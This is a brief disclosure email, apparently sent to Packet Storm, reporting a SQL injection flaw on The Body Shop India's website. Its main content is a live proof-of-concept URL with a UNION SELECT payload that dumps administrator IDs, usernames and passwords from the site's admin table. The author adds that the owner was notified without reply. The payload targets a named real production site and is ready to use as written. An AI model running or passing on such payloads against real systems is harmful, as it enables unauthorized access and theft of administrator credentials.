Hi Packetstorm Team

Sql injection found at *The Body Shop* which is a global manufacturer and
retailer of naturally inspired, ethically produced beauty and cosmetics
products.

Please refer below for the POC :

http://www.thebodyshop.in/values_campaign.php?page=-1+UNION+SELECT+1,2,3,4,group_concat%28admin_id,0x3a,user_name,0x3a,password%29,6+from+admin--


website owner has been informed many times but no response .

Thanks

Arvind Kumar